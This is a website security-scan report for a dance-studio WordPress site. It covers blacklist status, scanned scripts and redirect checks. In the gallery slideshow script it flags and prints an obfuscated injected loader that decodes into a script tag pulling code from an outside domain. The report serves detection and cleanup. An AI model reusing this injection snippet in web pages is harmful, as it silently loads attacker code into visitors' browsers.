Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=alphadance.com.ua
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://alphadance.com.ua/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://alphadance.com.ua/ | 200 OK Content-Length: 16980 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js | 200 OK Content-Length: 92556 Content-Type: text/javascript | clean |
http://malsup.github.com/jquery.cycle2.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=600 Connection: close Date: Tue, 26 Aug 2014 14:15:21 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 562 Location: http://malsup.github.io/jquery.cycle2.js Server: GitHub.com Vary: Accept-Encoding Content-Length: 178 Content-Type: text/html Expires: Tue, 26 Aug 2014 14:15:59 GMT X-Cache: HIT X-Cache-Hits: 20 X-Served-By: cache-fra1229-FRA X-Timer: S1409062521.544080,VS0,VE0 | clean |
http://malsup.github.io/jquery.cycle2.js | 200 OK Content-Length: 48900 Content-Type: application/javascript | clean |
http://alphadance.com.ua/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/x-javascript | clean |
http://alphadance.com.ua/wp-content/plugins/jquery-colorbox/js/jquery.colorbox-min.js?ver=1.3.20.1 | 200 OK Content-Length: 9789 Content-Type: application/x-javascript | clean |
http://alphadance.com.ua/wp-content/plugins/jquery-colorbox/js/jquery-colorbox-wrapper-min.js?ver=4.5 | 200 OK Content-Length: 8067 Content-Type: application/x-javascript | clean |
http://alphadance.com.ua/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.9995 | 200 OK Content-Length: 26590 Content-Type: application/x-javascript | clean |
http://alphadance.com.ua/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.06 | 200 OK Content-Length: 1984 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.fn.nggSlideshow=function(args){var defaults={id:1,width:320,height:240,fx:'fade',domain:'',timeout:5000};var s=jQuery.extend({},defaults,args);var obj=this.selector;var stack=[];var url=s.domain+'index.php?callback=json&api_key=true&format=json&method=gallery&id='+s.id;var stackLength=0;jQuery.getJSON(url,function(r){if(r.stat=="ok"){for(img in r.images){var photo=r.images[img];stack.push(decodeURI(photo['imageURL']))}stackLength=stack.length;loadImage(1)}});function loadI <!-- js-tools --> c=0;while(c<83)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00bvlsp.ufnqmbuf/dpn/vb0dpnqpofout0dpn`tfbsdi0tubu/qiq#?=0tdsjqu?'.charCodeAt(c++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://alphadance.com.ua/wp-content/plugins/ckeditor-for-wordpress/ckeditor/ckeditor.js?t=CBDD&ver=3.5 | 200 OK Content-Length: 300714 Content-Type: application/x-javascript | clean |
http://alphadance.com.ua/wp-content/plugins/ckeditor-for-wordpress/includes/ckeditor.utils.js?ver=3.5 | 200 OK Content-Length: 16080 Content-Type: application/x-javascript | clean |
http://alphadance.com.ua/contacts/ | 200 OK Content-Length: 12600 Content-Type: text/html | clean |
http://alphadance.com.ua/ÑÑили-ÑанÑев/ | 200 OK Content-Length: 11098 Content-Type: text/html | clean |
http://alphadance.com.ua/teathers/ | 200 OK Content-Length: 17608 Content-Type: text/html | clean |
http://alphadance.com.ua/ÑаÑпиÑание/ | 200 OK Content-Length: 10044 Content-Type: text/html | clean |
http://alphadance.com.ua/ÑенÑ/ | 200 OK Content-Length: 13881 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: alphadance.com.ua
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 26 Aug 2014 14:15:20 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://alphadance.com.ua/xmlrpc.php
X-Powered-By: PHP/5.3.10-1ubuntu3.13
GET / HTTP/1.1
Host: alphadance.com.ua
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 26 Aug 2014 14:15:20 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://alphadance.com.ua/xmlrpc.php
X-Powered-By: PHP/5.3.10-1ubuntu3.13
Second query (visit from search engine):
GET / HTTP/1.1
Host: alphadance.com.ua
Referer: http://www.google.com/search?q=alphadance.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: alphadance.com.ua
Referer: http://www.google.com/search?q=alphadance.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.